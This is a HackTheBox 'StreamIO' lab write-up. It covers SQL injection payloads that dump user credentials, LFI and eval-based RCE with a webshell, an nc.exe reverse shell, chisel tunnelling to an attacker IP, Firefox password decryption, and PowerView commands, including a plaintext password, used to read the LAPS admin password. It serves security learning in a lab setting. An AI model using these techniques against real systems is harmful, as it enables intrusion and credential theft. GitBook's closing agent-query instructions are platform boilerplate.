> For the complete documentation index, see [llms.txt](https://rouvin.gitbook.io/ibreakstuff/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/medium/streamio.md).

# StreamIO

## Gaining Access

Nmap Scan:

<figure><img src="/files/9odmzKmmMpk0IlDPiBNB" alt=""><figcaption></figcaption></figure>

### HTTPS Cert

On port 443, we can head to the website to find some kind of streaming platform.

<figure><img src="/files/FfE32jmldpJtsCdN2d3S" alt=""><figcaption></figcaption></figure>

Checking the cert, we can find another domain name:

<figure><img src="/files/HNMCCHSB82iQAxq3Ui6F" alt=""><figcaption></figcaption></figure>

We can add this domain to our `/etc/hosts` files. Another notable thing we found was the login function on the main domain.

### SQL Injection

The new domain leads us to a different website.

<figure><img src="/files/ClNV08JLGU2ajrJI3oV2" alt=""><figcaption></figcaption></figure>

The page was written in PHP (visiting index.php brings us to home page), thus we can fuzz possible endpoints with the `.php` extension using `gobuster -x` flag.

<figure><img src="/files/pKcQlLLoF9vvp1X8dDPd" alt=""><figcaption></figcaption></figure>

Within `search.php`, we can find a query function.

<figure><img src="/files/Vkwapf9IUvKBIQi57NC5" alt=""><figcaption></figcaption></figure>

This was vulnerable to SQL Injection, and the payload `a' union select 1,2,3,4,5,6;-- -` works. From here, we can enumerate out the users and tables present in the website.

<figure><img src="/files/KNeA18HYFnw9BHLQiOjS" alt=""><figcaption></figcaption></figure>

Using the STREAMIO database, we can dump out the tables present:

<figure><img src="/files/YyzIifOwWJz47lzKaUTg" alt=""><figcaption></figcaption></figure>

Then, we can take a look at the users table. This can be done using `a' union select 1, concat(username, ':', password), 3,4,5,6 from users; -- -`.

<figure><img src="/files/sNh9r5QRsml3fVzYK8LY" alt=""><figcaption></figcaption></figure>

After getting all the credentials, we can crack the hashes and then brute force the `login.php` page we found earlier on `streamio.htb`. The user `yoshihide` and his password works!

### Debug Fuzz

Within the admin dashboard, we can see a few functionalities that cause a unique parameter of `?staff=` to be passed.

<figure><img src="/files/sQ721HHNxHblCL1mKe17" alt=""><figcaption></figcaption></figure>

I found this rather interesting, and wanted to fuzz this more. I was able to find another `debug` endpoint using `wfuzz`.

<figure><img src="/files/HkBrB52FHm2C5AWe4cPy" alt=""><figcaption></figcaption></figure>

I also used `gobuster` to see what other files were present on this directory.

<figure><img src="/files/17etnc1IZwO5FHjXzWGG" alt=""><figcaption></figcaption></figure>

`master.php` was the most unique.

### Eval RCE

Within the debug page, there isn't much visual difference apart from one line:

<figure><img src="/files/TqEXxSyjUFC39Wx3VoEN" alt=""><figcaption></figcaption></figure>

Because this page was in PHP, I tested the `debug` parameter with a common `php://filter` LFI exploit, and this worked!

<figure><img src="/files/sZnalAiP1isp1C6r7UsR" alt=""><figcaption></figcaption></figure>

We can then take a look at that `master.php` file we found earlier. The last bit was the most interesting.

<pre class="language-php"><code class="lang-php">&#x3C;?php
if(isset($_POST['include']))
{
    if($_POST['include'] !== "index.php" ) 
        eval(file_get_contents($_POST['include']));
else
<strong>    echo(" ---- ERROR ---- ");
</strong>}
?> 
</code></pre>

The `eval()` function was being used, and this was definitely vulnerable to some kind of RCE. So to construct the attack, we can attempt to upload a `cmd.php` webshell via encoding with base64 and then send it via a POST request with an `include` parameter.

We can send this request here:

<figure><img src="/files/qloe4AU8XdFZZEsUEAOd" alt=""><figcaption></figcaption></figure>

And we finally have RCE on the machine. Then, we can gain a reverse shell via `nc.exe`.

<figure><img src="/files/WFwhK2O5WHD3RpuFgEB7" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

We don't have much control over the machine with this user, so we need to find another.

### MSSQL

When checking `netstat`, we can find a service listening on port 1433 that was not detectable earlier from our Kali machine.

<figure><img src="/files/Yij7Rfu5JahT8zTf9CNO" alt=""><figcaption></figcaption></figure>

Also, we can head to the `inetpub` folder to find credentials, of which we do within the `index.php` file:

<figure><img src="/files/F7RpcKKhk9zAKWznGM97" alt=""><figcaption></figcaption></figure>

We can then port forward via `chisel`.

```bash
# on Kali
./chisel server -p 8000 --reverse

# on Victim
.\chisel.exe client 10.10.16.12:8000 R:1433:127.0.0.1:1433
```

Using `mssqlclient.py`, we can access the database with the credentials we found.

<figure><img src="/files/8hMoz8YauoFynbtvcf3I" alt=""><figcaption></figcaption></figure>

I took a look at the streamio\_backup database and found credentials for a `nikk37` user.

<figure><img src="/files/SjblBzmpHyF5SlHHcJXC" alt=""><figcaption></figcaption></figure>

The hash can be cracked via crackstation.

<figure><img src="/files/QNmwywM3wzdOBGnljw3W" alt=""><figcaption></figcaption></figure>

Then, we can `evil-winrm` in as this user:

<figure><img src="/files/NqrG8mZoa3MGEYLPxqvt" alt=""><figcaption></figcaption></figure>

### Firefox Passwords + Bloodhound

When I ran WinPEAS on this machine, it picked up on a Firefox credential file. We can use `firepwd.py` to decrypt the passwords.

<figure><img src="/files/PVWEPtiAz4FcIPS7ra3h" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/lclevy/firepwd/blob/master/firepwd.py>" %}

Upon decrypting the `logins.json` file, we can find some more passwords.

<figure><img src="/files/5xzjnvWCfIUdqFfdLrcC" alt=""><figcaption></figcaption></figure>

Since we had credentials, I also ran a `bloodhound-python` to enumerate the objects within the host.

<figure><img src="/files/Ye4RgYKD0YBdoRYVfwpK" alt=""><figcaption></figcaption></figure>

Found that the `jdgodd` user had some permissions over the Core Staff group.

<figure><img src="/files/oC7J1fw7OWIEM37rrM0V" alt=""><figcaption></figcaption></figure>

And members of this Core Staff were able to ReadLAPSPassword for the DC.

<figure><img src="/files/fZPAHAUhXuJgkwhYhCZs" alt=""><figcaption></figcaption></figure>

### ReadLAPSPassword

To exploit this, we would first need to add the `jdgodd` user into the Core Staff group, and then read the administrator password.

The adding can be done via remote Powershell and Powerview using the credentials we found from Firefox earlier for `jdgodd`.

```powershell
$SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('streamio\JDgodd', $SecPassword)
Add-DomainObjectAcl -Credential $Cred -TargetIdentity "Core Staff" -principalidentity "streamio\JDgodd"
Add-DomainGroupMember -Identity "Core Staff" -Members 'streamio\JDgodd' -Credential $Cred
```

<figure><img src="/files/72n7wOBdO8WV2BwYzUMm" alt=""><figcaption></figcaption></figure>

Afterwards, we can use `crackmapexec` modules to read the LAPS password.

<figure><img src="/files/FbjRLVfkWaIrIDXXaeEC" alt=""><figcaption></figcaption></figure>

Then, we can `evil-winrm` in as the administrator.

<figure><img src="/files/ow1XPIPpO2ue0UY9Ix2w" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/medium/streamio.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
